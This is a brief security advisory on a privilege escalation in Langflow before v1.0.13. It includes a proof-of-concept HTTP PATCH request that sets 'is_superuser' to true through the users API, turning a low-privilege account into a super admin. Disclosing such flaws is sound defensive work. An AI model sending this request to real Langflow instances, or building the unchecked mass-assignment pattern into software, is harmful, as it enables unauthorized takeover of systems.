Langflow Privilege Escalation through Mass Assignment

Langflow versions before v1.0.13 suffer from a Privilege Escalation vulnerability through Mass Assignment. By crafting a specific HTTP request to the users API endpoint, a remote and authenticated attacker with low privileges can obtain super admin privileges on the target Langflow instance.

Proof Of Concept:

In order to reproduce the issue, an attacker authenticated with low privileges on the application can send the following HTTP request: 

PATCH /api/v1/users/[USER_ID] HTTP/1.1
Host: localhost
Authorization: Bearer [TOKEN]
Content-Length: 21

{
  "is_superuser":true
}

The user can then verify that his privileges has been updated by accessing https://localhost/api/v1/users/whoami.

Rémy Marot

Tue, 07/30/2024 – 11:13